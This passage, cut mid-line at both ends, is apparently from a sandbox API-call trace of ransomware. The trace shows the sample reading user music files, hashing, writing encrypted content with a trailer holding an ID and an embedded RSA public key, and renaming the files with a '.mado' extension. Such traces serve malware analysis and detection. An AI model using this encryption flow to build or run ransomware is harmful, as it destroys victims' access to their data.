lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.748] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.749] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x12b13, lpOverlapped=0x0) returned 1 [0204.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.750] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.751] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.751] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.751] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.751] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.751] GetLastError () returned 0x0 [0204.751] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.751] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.751] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.751] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.751] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.752] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe490 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe478 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.753] GetCurrentThreadId () returned 0x600 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b724d0 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.753] GetCurrentThreadId () returned 0x600 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80cd8 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.757] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x12b0e, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x12b0e, lpOverlapped=0x0) returned 1 [0204.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.757] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12b13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.757] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.757] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.757] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.757] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.758] CloseHandle (hObject=0x63c) returned 1 [0204.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.759] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uRbtjou9eX9oaPptUC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\urbtjou9ex9oapptuc.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uRbtjou9eX9oaPptUC.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\urbtjou9ex9oapptuc.m4a.mado")) returned 1 [0204.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.759] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.761] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x638955e0, ftCreationTime.dwHighDateTime=0x1d5e737, ftLastAccessTime.dwLowDateTime=0x9851bb30, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0x9851bb30, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xa22b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VW1UqmIAHdW7i.wav", cAlternateFileName="VW1UQM~1.WAV")) returned 1 [0204.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.761] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VW1UqmIAHdW7i.wav") returned=".wav" [0204.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VW1UqmIAHdW7i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw1uqmiahdw7i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.762] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=41515) returned 1 [0204.762] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.765] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa205, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.765] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.766] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 